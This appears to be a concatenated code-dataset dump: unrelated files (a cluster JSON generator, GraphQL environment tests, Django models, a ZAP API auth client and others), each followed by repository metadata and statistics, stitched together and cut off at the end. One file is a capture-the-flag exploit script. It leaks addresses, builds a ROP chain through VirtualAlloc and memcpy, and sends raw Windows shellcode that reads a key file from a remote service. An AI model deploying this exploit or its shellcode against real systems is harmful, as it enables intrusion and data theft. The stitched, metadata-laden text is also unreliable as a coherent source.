#/usr/bin/env python ''' @2018-01 by lanhin Generate cluster json file. Usage: python2 clustergen.py The output file name is cluster.json ''' import getopt import sys import os def jsonout(fileout, devices, edges, nodelinks): with open(fileout, "wb") as result: outItem = "{\n \"devices\":\n [\n" result.write(outItem) # Write devices for i in range(len(devices)-1): outItem = "\t{\"id\":\""+(str)(devices[i][0])+"\",\n\t\"compute\":\""+(str)(devices[i][1])+"\",\n\t\"RAM\":\""+(str)(devices[i][2])+"\",\n\t\"bw\":\""+(str)(devices[i][3])+"\",\n\t\"loc\":\""+str(devices[i][4])+"\"\n\t},\n" result.write(outItem) outItem = "\t{\"id\":\""+(str)(devices[-1][0])+"\",\n\t\"compute\":\""+(str)(devices[-1][1])+"\",\n\t\"RAM\":\""+(str)(devices[-1][2])+"\",\n\t\"bw\":\""+(str)(devices[-1][3])+"\",\n\t\"loc\":\""+str(devices[-1][4])+"\"\n\t}\n" result.write(outItem) outItem = " ],\n \"links\":\n [\n" result.write(outItem) # Write links for i in range(len(edges)-1): outItem = "\t{\"src\":\""+(str)(edges[i][0])+"\",\n\t\"dst\":\""+(str)(edges[i][1])+"\",\n\t\"bw\":\""+(str)(edges[i][2])+"\"\n\t},\n" result.write(outItem) outItem = "\t{\"src\":\""+(str)(edges[-1][0])+"\",\n\t\"dst\":\""+(str)(edges[-1][1])+"\",\n\t\"bw\":\""+(str)(edges[-1][2])+"\"\n\t}" result.write(outItem) if len(nodelinks) > 0: outItem = ",\n" else: outItem = "\n" result.write(outItem) for i in range(len(nodelinks)-1): outItem = "\t{\"src\":\""+(str)(nodelinks[i][0])+"\",\n\t\"dst\":\""+(str)(nodelinks[i][1])+"\",\n\t\"bw\":\""+(str)(nodelinks[i][2])+"\",\n\t\"BetweenNode\":\"true\"\n\t},\n" result.write(outItem) outItem = "\t{\"src\":\""+(str)(nodelinks[-1][0])+"\",\n\t\"dst\":\""+(str)(nodelinks[-1][1])+"\",\n\t\"bw\":\""+(str)(nodelinks[-1][2])+"\",\n\t\"BetweenNode\":\"true\"\n\t}\n" result.write(outItem) outItem = " ]\n}\n" result.write(outItem) # compute, RAM, bw, network devs = [("1000000", "1048576", "1111490", "1600000"), ("10000000", "1048576", "1342177", "3200000"), ("100000000", "2097152", "1342177", "3200000")] # id, output network bandwidth in KB/s comnodes = [(0,1000000), (1,20000000), (2,1000000), (3,1000000), (4,1000000), (5,1000000), (6,1000000), (7,1000000)] # id, compute, RAM, bw, location, network bandwidth devices = list() edges = list() nodelinks = list() if (len(sys.argv)) != 2: print "Usage: python clustergen.py <cluster input file>" exit(1) filein = sys.argv[1] fileout = filein + '.json' print "Input:",filein print "Output:",fileout if os.path.isfile(fileout): os.remove(fileout) with open(filein, "rb") as source: for line in source: # id, index, location splited = line.strip().split(' ') devices.append((int(splited[0]), devs[int(splited[1])][0], devs[int(splited[1])][1], devs[int(splited[1])][2], splited[2], devs[int(splited[1])][3])) for i in range(len(devices)): if int(devices[i][4]) == int(splited[-1]) and devices[i][0] != int(splited[0]): # in the same node bw = min(float(devices[i][-1]), float(devs[int(splited[1])][-1])) edges.append((splited[0], devices[i][0], str(bw))) for i in range(len(comnodes)): for j in range(i+1, len(comnodes)): if j >= len(comnodes): continue nodelinks.append((comnodes[i][0], comnodes[j][0], min(float(comnodes[i][1]), float(comnodes[j][1])))) #print devices #print edges #print nodelinks jsonout(fileout, devices, edges, nodelinks)
37.63
235
0.526707
524
3,763
3.782443
0.204198
0.024218
0.090817
0.086276
0.415237
0.279011
0.098385
0.098385
0.067608
0.067608
0
0.073476
0.193463
3,763
99
236
38.010101
0.579572
0.062184
0
0.16129
1
0
0.273263
0.121025
0
0
0
0
0
0
null
null
0
0.048387
null
null
0.048387
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
2
abbc16642f88ae7f1504bc4fde9ba1c81bcb930e
19,773
py
Python
packages/gtmapi/lmsrvlabbook/tests/test_environment_queries.py
gigabackup/gigantum-client
70fe6b39b87b1c56351f2b4c551b6f1693813e4f
[ "MIT" ]
60
2018-09-26T15:46:00.000Z
2021-10-10T02:37:14.000Z
packages/gtmapi/lmsrvlabbook/tests/test_environment_queries.py
gigabackup/gigantum-client
70fe6b39b87b1c56351f2b4c551b6f1693813e4f
[ "MIT" ]
1,706
2018-09-26T16:11:22.000Z
2021-08-20T13:37:59.000Z
packages/gtmapi/lmsrvlabbook/tests/test_environment_queries.py
griffinmilsap/gigantum-client
70fe6b39b87b1c56351f2b4c551b6f1693813e4f
[ "MIT" ]
11
2019-03-14T13:23:51.000Z
2022-01-25T01:29:16.000Z
import pytest import graphene from gtmcore.inventory.inventory import InventoryManager from gtmcore.fixtures import ENV_UNIT_TEST_REPO, ENV_UNIT_TEST_BASE, ENV_UNIT_TEST_REV from gtmcore.environment import ComponentManager from gtmcore.environment.bundledapp import BundledAppManager import gtmcore from lmsrvlabbook.tests.fixtures import fixture_working_dir_env_repo_scoped, fixture_working_dir class TestEnvironmentServiceQueries(object): def test_get_environment_status(self, fixture_working_dir, snapshot): """Test getting the a LabBook's environment status""" im = InventoryManager() lb = im.create_labbook("default", "default", "labbook10", description="my first labbook10000") query = """ { labbook(owner: "default", name: "labbook10") { environment { containerStatus imageStatus } } } """ snapshot.assert_match(fixture_working_dir[2].execute(query)) def test_get_base(self, fixture_working_dir_env_repo_scoped, snapshot): """Test getting the a LabBook's base""" # Create labbook query = """ mutation myCreateLabbook($name: String!, $desc: String!, $repository: String!, $base_id: String!, $revision: Int!) { createLabbook(input: {name: $name, description: $desc, repository: $repository, baseId: $base_id, revision: $revision}) { labbook { id name description } } } """ variables = {"name": "labbook-base-test", "desc": "my test 1", "base_id": ENV_UNIT_TEST_BASE, "repository": ENV_UNIT_TEST_REPO, "revision": ENV_UNIT_TEST_REV} snapshot.assert_match(fixture_working_dir_env_repo_scoped[2].execute(query, variable_values=variables)) query = """ { labbook(owner: "default", name: "labbook-base-test") { name description environment { base{ id componentId name description readme tags icon osClass osRelease license url languages developmentTools dockerImageServer dockerImageNamespace dockerImageRepository dockerImageTag packageManagers } } } } """ snapshot.assert_match(fixture_working_dir_env_repo_scoped[2].execute(query)) def test_get_package_manager(self, fixture_working_dir_env_repo_scoped, snapshot): """Test getting the a LabBook's package manager dependencies""" # Create labbook im = InventoryManager() lb = im.create_labbook("default", "default", "labbook4", description="my first labbook10000") query = """ { labbook(owner: "default", name: "labbook4") { environment { packageDependencies { edges { node { id manager package version fromBase } cursor } pageInfo { hasNextPage } } } } } """ # should be null snapshot.assert_match(fixture_working_dir_env_repo_scoped[2].execute(query)) # Add a base image cm = ComponentManager(lb) pkgs = [{"manager": "pip", "package": "requests", "version": "1.3"}, {"manager": "pip", "package": "numpy", "version": "1.12"}, {"manager": "pip", "package": "gtmunit1", "version": "0.2.4"}] cm.add_packages('pip', pkgs) pkgs = [{"manager": "conda3", "package": "cdutil", "version": "8.1"}, {"manager": "conda3", "package": "nltk", "version": '3.2.5'}] cm.add_packages('conda3', pkgs) # Add one package without a version, which should cause an error in the API since version is required pkgs = [{"manager": "apt", "package": "lxml", "version": "3.4"}] cm.add_packages('apt', pkgs) query = """ { labbook(owner: "default", name: "labbook4") { environment { packageDependencies { edges { node { id manager package version fromBase } cursor } pageInfo { hasNextPage } } } } } """ r1 = fixture_working_dir_env_repo_scoped[2].execute(query) assert 'errors' not in r1 snapshot.assert_match(r1) query = """ { labbook(owner: "default", name: "labbook4") { environment { packageDependencies(first: 2, after: "MA==") { edges { node { id manager package version fromBase } cursor } pageInfo { hasNextPage } } } } } """ r1 = fixture_working_dir_env_repo_scoped[2].execute(query) assert 'errors' not in r1 snapshot.assert_match(r1) def test_get_package_manager_metadata(self, fixture_working_dir_env_repo_scoped, snapshot): """Test getting the a LabBook's package manager dependencies""" # Create labbook im = InventoryManager() lb = im.create_labbook("default", "default", "labbook4meta", description="my first asdf") query = """ { labbook(owner: "default", name: "labbook4meta") { environment { packageDependencies { edges { node { id manager package version fromBase description docsUrl latestVersion } cursor } pageInfo { hasNextPage } } } } } """ # should be null snapshot.assert_match(fixture_working_dir_env_repo_scoped[2].execute(query)) # Add a base image cm = ComponentManager(lb) pkgs = [{"manager": "pip", "package": "gtmunit3", "version": "5.0"}, {"manager": "pip", "package": "gtmunit2", "version": "12.2"}, {"manager": "pip", "package": "gtmunit1", "version": '0.2.1'}] cm.add_packages('pip', pkgs) pkgs = [{"manager": "conda3", "package": "cdutil", "version": "8.1"}, {"manager": "conda3", "package": "python-coveralls", "version": "2.5.0"}] cm.add_packages('conda3', pkgs) r1 = fixture_working_dir_env_repo_scoped[2].execute(query) assert 'errors' not in r1 snapshot.assert_match(r1) def test_package_query_with_errors(self, snapshot, fixture_working_dir_env_repo_scoped): """Test querying for package info""" # Create labbook im = InventoryManager() lb = im.create_labbook("default", "default", "labbook5", description="my first labbook10000") query = """ { labbook(owner: "default", name: "labbook5"){ id checkPackages(packageInput: [ {manager: "pip", package: "gtmunit1", version:"0.2.4"}, {manager: "pip", package: "gtmunit2", version:"100.00"}, {manager: "pip", package: "gtmunit3", version:""}, {manager: "pip", package: "asdfasdfasdf", version:""}]){ id manager package version latestVersion description isValid } } } """ snapshot.assert_match(fixture_working_dir_env_repo_scoped[2].execute(query)) def test_package_query_with_errors_conda(self, snapshot, fixture_working_dir_env_repo_scoped): """Test querying for package info""" # Create labbook im = InventoryManager() lb = im.create_labbook("default", "default", "labbook5conda", description="my first labbook10000") query = """ { labbook(owner: "default", name: "labbook5conda"){ id checkPackages(packageInput: [ {manager: "conda3", package: "cdutil", version:"8.1"}, {manager: "conda3", package: "nltk", version:"100.00"}, {manager: "conda3", package: "python-coveralls", version:""}, {manager: "conda3", package: "thisshouldtotallyfail", version:"1.0"}, {manager: "conda3", package: "notarealpackage", version:""}]){ id manager package version latestVersion description isValid } } } """ snapshot.assert_match(fixture_working_dir_env_repo_scoped[2].execute(query)) def test_package_query_with_errors_apt(self, snapshot, fixture_working_dir_env_repo_scoped): """Test querying for package info""" # Create labbook im = InventoryManager() lb = im.create_labbook("default", "default", "labbook5apt", description="my first labbook10000") # Create Component Manager cm = ComponentManager(lb) # Add a component cm.add_base(ENV_UNIT_TEST_REPO, ENV_UNIT_TEST_BASE, ENV_UNIT_TEST_REV) query = """ { labbook(owner: "default", name: "labbook5apt"){ id checkPackages(packageInput: [ {manager: "apt", package: "curl", version:"8.1"}, {manager: "apt", package: "notarealpackage", version:""}]){ id manager package version latestVersion description isValid } } } """ snapshot.assert_match(fixture_working_dir_env_repo_scoped[2].execute(query)) def test_package_query(self, snapshot, fixture_working_dir_env_repo_scoped): """Test querying for package info""" im = InventoryManager() lb = im.create_labbook("default", "default", "labbook6", description="my first labbook10000") query = """ { labbook(owner: "default", name: "labbook6"){ id checkPackages(packageInput: [ {manager: "pip", package: "gtmunit1", version:"0.2.4"}, {manager: "pip", package: "gtmunit2", version:""}]){ id manager package version isValid } } } """ snapshot.assert_match(fixture_working_dir_env_repo_scoped[2].execute(query)) def test_package_query_no_version(self, snapshot, fixture_working_dir_env_repo_scoped): """Test querying for package info""" im = InventoryManager() lb = im.create_labbook("default", "default", "labbook6noversion", description="my first labbook10000") # Create Component Manager cm = ComponentManager(lb) cm.add_base(ENV_UNIT_TEST_REPO, ENV_UNIT_TEST_BASE, ENV_UNIT_TEST_REV) query = """ { labbook(owner: "default", name: "labbook6noversion"){ id checkPackages(packageInput: [ {manager: "pip", package: "gtmunit1"}, {manager: "pip", package: "notarealpackage"}]){ id manager package version latestVersion description isValid } } } """ snapshot.assert_match(fixture_working_dir_env_repo_scoped[2].execute(query)) query = """ { labbook(owner: "default", name: "labbook6noversion"){ id checkPackages(packageInput: [ {manager: "apt", package: "curl"}, {manager: "apt", package: "notarealpackage"}]){ id manager package version latestVersion description isValid } } } """ snapshot.assert_match(fixture_working_dir_env_repo_scoped[2].execute(query)) query = """ { labbook(owner: "default", name: "labbook6noversion"){ id checkPackages(packageInput: [ {manager: "conda3", package: "nltk"}, {manager: "conda3", package: "notarealpackage"}]){ id manager package version latestVersion description isValid } } } """ snapshot.assert_match(fixture_working_dir_env_repo_scoped[2].execute(query)) def test_bundle_app_query(self, snapshot, fixture_working_dir_env_repo_scoped): """Test querying for bundled app info""" im = InventoryManager() lb = im.create_labbook("default", "default", "labbook-bundle", description="my first df") query = """ { labbook(owner: "default", name: "labbook-bundle"){ id environment { bundledApps{ id appName description port command } } } } """ snapshot.assert_match(fixture_working_dir_env_repo_scoped[2].execute(query)) bam = BundledAppManager(lb) bam.add_bundled_app(8050, 'dash 1', 'a demo dash app 1', 'python app1.py') bam.add_bundled_app(9000, 'dash 2', 'a demo dash app 2', 'python app2.py') bam.add_bundled_app(9001, 'dash 3', 'a demo dash app 3', 'python app3.py') snapshot.assert_match(fixture_working_dir_env_repo_scoped[2].execute(query)) def test_base_update_available(self, fixture_working_dir_env_repo_scoped, snapshot): """Test checking if the base is able to be updated""" im = InventoryManager() lb = im.create_labbook('default', 'default', 'labbook-base-test-update') cm = ComponentManager(lb) # Add an old base. cm.add_base(gtmcore.fixtures.ENV_UNIT_TEST_REPO, 'quickstart-jupyterlab', 1) query = """ { labbook(owner: "default", name: "labbook-base-test-update") { name description environment { base{ id revision } baseLatestRevision } } } """ r = fixture_working_dir_env_repo_scoped[2].execute(query) assert 'errors' not in r assert r['data']['labbook']['environment']['base']['revision'] == 1 assert r['data']['labbook']['environment']['baseLatestRevision'] == 2 # We upgrade our base to the latest cm.change_base(gtmcore.fixtures.ENV_UNIT_TEST_REPO, 'quickstart-jupyterlab', 2) r = fixture_working_dir_env_repo_scoped[2].execute(query) assert 'errors' not in r assert r['data']['labbook']['environment']['base']['revision'] == 2 assert r['data']['labbook']['environment']['baseLatestRevision'] == 2 query = """ { labbook(owner: "default", name: "labbook-base-test-update") { name environment { baseLatestRevision } } } """ r = fixture_working_dir_env_repo_scoped[2].execute(query) assert 'errors' not in r assert r['data']['labbook']['environment']['baseLatestRevision'] == 2
39.546
111
0.427603
1,438
19,773
5.683588
0.140473
0.056528
0.068641
0.073412
0.761899
0.724826
0.69387
0.662058
0.638444
0.564786
0
0.018524
0.483993
19,773
499
112
39.625251
0.782515
0.040813
0
0.543529
0
0
0.657899
0.027944
0
0
0
0
0.065882
1
0.025882
false
0
0.018824
0
0.047059
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
abc3eecfb1dec304561dc28f93ae2435fd288309
379
py
Python
automatization_of_data_mining_project/data_set_statistic_reporter/classes/statistic_generator/statistic_generator.py
Sale1996/automatization_of_data_mining_project
223aec59231586563a3b125bff064f8420630a8f
[ "MIT" ]
null
null
null
automatization_of_data_mining_project/data_set_statistic_reporter/classes/statistic_generator/statistic_generator.py
Sale1996/automatization_of_data_mining_project
223aec59231586563a3b125bff064f8420630a8f
[ "MIT" ]
null
null
null
automatization_of_data_mining_project/data_set_statistic_reporter/classes/statistic_generator/statistic_generator.py
Sale1996/automatization_of_data_mining_project
223aec59231586563a3b125bff064f8420630a8f
[ "MIT" ]
null
null
null
from typing import List class StatisticGenerator(object): def __init__(self, column_names): self.column_names = column_names ''' Function which returns two arrays: 1. Statistic column names 2. Statistic column values for each column name ''' def generate_statistic(self, data_set) -> (List[str], List[str]): pass
27.071429
69
0.643799
45
379
5.222222
0.644444
0.187234
0.12766
0
0
0
0
0
0
0
0
0.007273
0.274406
379
14
70
27.071429
0.847273
0
0
0
0
0
0
0
0
0
0
0
0
1
0.333333
false
0.166667
0.166667
0
0.666667
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
1
0
0
0
0
0
2
abc616e2534ce71688707838c39b33ab9fe3a9aa
869
py
Python
yepes/contrib/standards/models.py
samuelmaudo/yepes
1ef9a42d4eaa70d9b3e6e7fa519396c1e1174fcb
[ "BSD-3-Clause" ]
null
null
null
yepes/contrib/standards/models.py
samuelmaudo/yepes
1ef9a42d4eaa70d9b3e6e7fa519396c1e1174fcb
[ "BSD-3-Clause" ]
null
null
null
yepes/contrib/standards/models.py
samuelmaudo/yepes
1ef9a42d4eaa70d9b3e6e7fa519396c1e1174fcb
[ "BSD-3-Clause" ]
null
null
null
# -*- coding:utf-8 -*- from yepes.apps import apps AbstractCountry = apps.get_class('standards.abstract_models', 'AbstractCountry') AbstractCountrySubdivision = apps.get_class('standards.abstract_models', 'AbstractCountrySubdivision') AbstractCurrency = apps.get_class('standards.abstract_models', 'AbstractCurrency') AbstractGeographicArea = apps.get_class('standards.abstract_models', 'AbstractGeographicArea') AbstractLanguage = apps.get_class('standards.abstract_models', 'AbstractLanguage') AbstractRegion = apps.get_class('standards.abstract_models', 'AbstractRegion') class Country(AbstractCountry): pass class CountrySubdivision(AbstractCountrySubdivision): pass class Currency(AbstractCurrency): pass class GeographicArea(AbstractGeographicArea): pass class Language(AbstractLanguage): pass class Region(AbstractRegion): pass
28.032258
102
0.802071
80
869
8.5625
0.3125
0.061314
0.105109
0.183942
0.306569
0.306569
0
0
0
0
0
0.001274
0.096663
869
30
103
28.966667
0.871338
0.023015
0
0.315789
0
0
0.306147
0.234043
0
0
0
0
0
1
0
false
0.315789
0.052632
0
0.368421
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
2
abcf74d3543dcbf2c7fa1eff397453f8e4095e08
3,044
py
Python
python/api/src/zapv2/auth.py
psiinon/zaproxy-release
5462b14fb337a2d4f68595a207aa3367ec71a671
[ "ECL-2.0", "Apache-2.0", "BSD-3-Clause" ]
1
2017-07-26T18:03:44.000Z
2017-07-26T18:03:44.000Z
python/api/src/zapv2/auth.py
gcxtx/zappy
3d215327addd6f2ea4ca7091a42c330c67fc30ef
[ "ECL-2.0", "Apache-2.0", "BSD-3-Clause" ]
2
2016-02-25T10:06:53.000Z
2016-03-29T07:49:34.000Z
python/api/src/zapv2/auth.py
gcxtx/zappy
3d215327addd6f2ea4ca7091a42c330c67fc30ef
[ "ECL-2.0", "Apache-2.0", "BSD-3-Clause" ]
1
2021-08-17T05:48:59.000Z
2021-08-17T05:48:59.000Z
# Zed Attack Proxy (ZAP) and its related class files. # # ZAP is an HTTP/HTTPS proxy for assessing web application security. # # Copyright 2013 ZAP development team # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ This file was automatically generated. """ class auth(object): def __init__(self, zap): self.zap = zap def login_url(self, contextid): return self.zap._request(self.zap.base + 'auth/view/loginUrl/', {'contextId' : contextid}) def login_data(self, contextid): return self.zap._request(self.zap.base + 'auth/view/loginData/', {'contextId' : contextid}) def logged_in_indicator(self, contextid): return self.zap._request(self.zap.base + 'auth/view/loggedInIndicator/', {'contextId' : contextid}) def logout_url(self, contextid): return self.zap._request(self.zap.base + 'auth/view/logoutUrl/', {'contextId' : contextid}) def logout_data(self, contextid): return self.zap._request(self.zap.base + 'auth/view/logoutData/', {'contextId' : contextid}) def logged_out_indicator(self, contextid): return self.zap._request(self.zap.base + 'auth/view/loggedOutIndicator/', {'contextId' : contextid}) def login(self, contextid): return self.zap._request(self.zap.base + 'auth/action/login/', {'contextId' : contextid}) def logout(self, contextid): return self.zap._request(self.zap.base + 'auth/action/logout/', {'contextId' : contextid}) @property def auto_reauth_on(self): return self.zap._request(self.zap.base + 'auth/action/autoReauthOn/').get('autoReauthOn') @property def auto_reauth_off(self): return self.zap._request(self.zap.base + 'auth/action/autoReauthOff/').get('autoReauthOff') def set_login_url(self, contextid, url, postdata=''): return self.zap._request(self.zap.base + 'auth/action/setLoginUrl/', {'contextId' : contextid, 'url' : url, 'postData' : postdata}) def set_login_indicator(self, contextid, indicator): return self.zap._request(self.zap.base + 'auth/action/setLoginIndicator/', {'contextId' : contextid, 'indicator' : indicator}) def set_logout_url(self, contextid, url, postdata=''): return self.zap._request(self.zap.base + 'auth/action/setLogoutUrl/', {'contextId' : contextid, 'url' : url, 'postData' : postdata}) def set_logged_out_indicator(self, contextid, indicator): return self.zap._request(self.zap.base + 'auth/action/setLoggedOutIndicator/', {'contextId' : contextid, 'indicator' : indicator})
42.277778
140
0.703022
389
3,044
5.401028
0.298201
0.099952
0.086625
0.13327
0.443598
0.435031
0.435031
0.435031
0.391242
0.391242
0
0.003145
0.164258
3,044
71
141
42.873239
0.82272
0.23456
0
0.060606
0
0
0.221788
0.105035
0
0
0
0
0
1
0.454545
false
0
0
0.424242
0.909091
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
0
0
0
2
abd7ebb6a3efed0c59a0bf6d4b58df0c2f293555
307
py
Python
Models/utils.py
Pipe-Runner-Lab/cornell_birdcall_identification
79a807c4a7e368b2ffcb7ecc91176c2bc03f650a
[ "MIT" ]
null
null
null
Models/utils.py
Pipe-Runner-Lab/cornell_birdcall_identification
79a807c4a7e368b2ffcb7ecc91176c2bc03f650a
[ "MIT" ]
7
2021-08-23T20:52:07.000Z
2022-03-12T00:48:51.000Z
Models/utils.py
Pipe-Runner-Lab/cornell_birdcall_identification
79a807c4a7e368b2ffcb7ecc91176c2bc03f650a
[ "MIT" ]
null
null
null
from torch import nn def get_default_fc(num_ftrs,adjusted_classes, params): return nn.Sequential( nn.Linear(num_ftrs, 1024),nn.ReLU(),nn.Dropout(p=params.fc_drop_out_0), nn.Linear(1024, 1024),nn.ReLU(),nn.Dropout(p=params.fc_drop_out_1), nn.Linear(1024, adjusted_classes) )
34.111111
79
0.703583
50
307
4.08
0.48
0.117647
0.098039
0.117647
0.343137
0.343137
0.343137
0.343137
0.343137
0.343137
0
0.069767
0.159609
307
8
80
38.375
0.72093
0
0
0
0
0
0
0
0
0
0
0
0
1
0.142857
false
0
0.142857
0.142857
0.428571
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
1
0
0
0
2
abea45b584c7c99d2b9324078e8fed24a7f61377
369
py
Python
lepoop/entry/not_configured.py
alvinwan/lepoop
a611a4334941527077b1f772d1ac0ae008daedc0
[ "MIT" ]
null
null
null
lepoop/entry/not_configured.py
alvinwan/lepoop
a611a4334941527077b1f772d1ac0ae008daedc0
[ "MIT" ]
null
null
null
lepoop/entry/not_configured.py
alvinwan/lepoop
a611a4334941527077b1f772d1ac0ae008daedc0
[ "MIT" ]
null
null
null
"""Runs when the `poop` alias has not been setup.""" from colorama import init from ..utils import colored from .alias import is_configured from .alias import configure init() def main(): if not is_configured(): configure() print(colored('The `poop` alias was configured successfully.\n' 'Run `source ~/.bashrc` or restart your shell.'))
21.705882
67
0.682927
50
369
5
0.64
0.056
0.096
0
0
0
0
0
0
0
0
0
0.205962
369
16
68
23.0625
0.853242
0.124661
0
0
0
0
0.290221
0
0
0
0
0
0
1
0.1
true
0
0.4
0
0.5
0.1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
0
0
0
2
abfa15dff9f5420c035b3826b1395528ac642299
3,517
py
Python
csaw-2014/exploit/400-1/exploit.py
anarcheuz/CTF
beaccbfe036d90c7d7018978bad288c831d3f8f5
[ "MIT" ]
2
2015-03-24T22:20:08.000Z
2018-05-12T16:41:13.000Z
csaw-2014/exploit/400-1/exploit.py
anarcheuz/CTF
beaccbfe036d90c7d7018978bad288c831d3f8f5
[ "MIT" ]
null
null
null
csaw-2014/exploit/400-1/exploit.py
anarcheuz/CTF
beaccbfe036d90c7d7018978bad288c831d3f8f5
[ "MIT" ]
null
null
null
import socket import re from struct import pack from time import sleep def recv_until(s, string=""): text = "" while 1 : data = s.recv(4096) text+=data if not data or data.find(string) != -1: break return text def leak(s): s.send("A\n") text = recv_until(s, "Selection:") slide, stack = re.findall('0x[0-9a-f]{8}', text) slide = int(slide, 16) + 0x400000 stack = int(stack, 16) return (slide, stack) def vuln(s, payload): s.send("V\n") recv_until(s, "(with some constraints).") s.send(payload) host = '192.168.0.10' s=socket.create_connection((host, 9998)) recv_until(s, "Password:") s.send('GreenhornSecretPassword!!!\n') ### leak recv_until(s, 'Selection:') slide, stack = leak(s) VirtualAlloc = 0x11c0 + slide memcpy = 0x1684 + slide print_output = 0x14d0 + slide pop4 = 0x199e + slide ret = 0x19a2 + slide eip_off = 0x404 buffer_start = stack - 0x3f8 shellcode_loc = buffer_start + 4 shellcode_len = 0x400 ### ROP """cedcl_ convention""" rop = [ VirtualAlloc, #wrapper pop4, 0, 0x1000, 0x40, buffer_start + eip_off + 4 * 8, #will stock ptr to alloc' zone in memcpy 1st arg memcpy, ret, #will return to 1st param 0xcccccccc, shellcode_loc, shellcode_len ] shellcode = [0x55, 0x89, 0xE5, 0x81, 0xEC, 0x10, 0x00, 0x00, 0x00, 0x89, 0x45, 0xFC, 0x64, 0x8B, 0x1D, 0x30, 0x00, 0x00, 0x00, 0x8B, 0x5B, 0x0C, 0x8B, 0x5B, 0x14, 0x8B, 0x1B, 0x8B, 0x1B, 0x8B, 0x5B, 0x10, 0x8B, 0x73, 0x3C, 0x01, 0xDE, 0x8B, 0x76, 0x78, 0x01, 0xDE, 0x56, 0x8B, 0x7E, 0x20, 0x01, 0xDF, 0x8B, 0x4E, 0x14, 0x31, 0xC0, 0x57, 0x51, 0x8B, 0x3F, 0x01, 0xDF, 0xBE, 0xFA, 0x00, 0x00, 0x00, 0x03, 0x75, 0xFC, 0x31, 0xC9, 0xB1, 0x0E, 0xF3, 0xA6, 0x59, 0x5F, 0x74, 0x0B, 0x81, 0xC7, 0x04, 0x00, 0x00, 0x00, 0x40, 0xE2, 0xDF, 0x0F, 0x0B, 0x5E, 0x8B, 0x56, 0x24, 0x01, 0xDA, 0xD1, 0xE0, 0x01, 0xD0, 0x31, 0xC9, 0x66, 0x8B, 0x08, 0x8B, 0x46, 0x1C, 0x01, 0xD8, 0xC1, 0xE1, 0x02, 0x01, 0xC8, 0x8B, 0x10, 0x01, 0xDA, 0x5E, 0x89, 0xF7, 0x31, 0xC9, 0x89, 0x55, 0xF8, 0x89, 0x5D, 0xF4, 0xBE, 0x09, 0x01, 0x00, 0x00, 0x03, 0x75, 0xFC, 0x56, 0xFF, 0x75, 0xF4, 0xFF, 0x55, 0xF8, 0x89, 0xC3, 0x68, 0x6B, 0x65, 0x79, 0x00, 0x89, 0xE0, 0x68, 0x00, 0x00, 0x00, 0x00, 0x68, 0x80, 0x00, 0x00, 0x00, 0x68, 0x03, 0x00, 0x00, 0x00, 0x68, 0x00, 0x00, 0x00, 0x00, 0x68, 0x01, 0x00, 0x00, 0x00, 0xB9, 0x00, 0x00, 0x00, 0x80, 0x51, 0x50, 0xFF, 0xD3, 0x81, 0xC4, 0x04, 0x00, 0x00, 0x00, 0x50, 0xBE, 0x15, 0x01, 0x00, 0x00, 0x03, 0x75, 0xFC, 0x56, 0xFF, 0x75, 0xF4, 0xFF, 0x55, 0xF8, 0x5B, 0x81, 0xEC, 0x00, 0x01, 0x00, 0x00, 0x89, 0xE1, 0x68, 0x00, 0x00, 0x00, 0x00, 0x68, 0x00, 0x00, 0x00, 0x00, 0x68, 0x00, 0x01, 0x00, 0x00, 0x51, 0x53, 0xFF, 0xD0, 0x8B, 0x45, 0xFC, 0x8B, 0x80, 0x1E, 0x01, 0x00, 0x00, 0x54, 0xFF, 0xD0, 0x0F, 0x0B, 0x47, 0x65, 0x74, 0x50, 0x72, 0x6F, 0x63, 0x41, 0x64, 0x64, 0x72, 0x65, 0x73, 0x73, 0x00, 0x43, 0x72, 0x65, 0x61, 0x74, 0x65, 0x46, 0x69, 0x6C, 0x65, 0x41, 0x00, 0x52, 0x65, 0x61, 0x64, 0x46, 0x69, 0x6C, 0x65, 0x00, # exclude last 4 bytes since we want to replace them 0xCC, 0xCC, 0xCC, 0xCC, ][:-4] exploit = "CSAW" #mandatory exploit += "".join([chr(c) for c in shellcode]) exploit += pack("<I", print_output) #print result of ReadFile back to us exploit += "\xcc"*(eip_off - len(exploit)) exploit += "".join([pack("<I", dword) for dword in rop]) vuln(s, exploit) s.shutdown(socket.SHUT_WR) sleep(1) print s.recv(1024)
33.179245
88
0.639181
539
3,517
4.133581
0.402597
0.125673
0.091562
0.043088
0.130162
0.121185
0.084381
0.078995
0.078995
0.046679
0
0.296656
0.209269
3,517
105
89
33.495238
0.504495
0.051464
0
0
0
0
0.037576
0.008485
0
0
0.373636
0
0
0
null
null
0.023529
0.047059
null
null
0.035294
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
2
abfa9fcc8c8d6fc061a4cea57ebd8295d4f79af3
9,504
py
Python
vnpy/trader/app/spreadTrading/stBase.py
cmbclh/vnpy1.7
25a95ba63c7797e92ba45450d79ee1326135fb47
[ "MIT" ]
1
2017-10-09T06:05:11.000Z
2017-10-09T06:05:11.000Z
vnpy/trader/app/spreadTrading/stBase.py
cmbclh/vnpy-1.7
ccca92139198a0d213c15fe531f37c1c702ee968
[ "MIT" ]
null
null
null
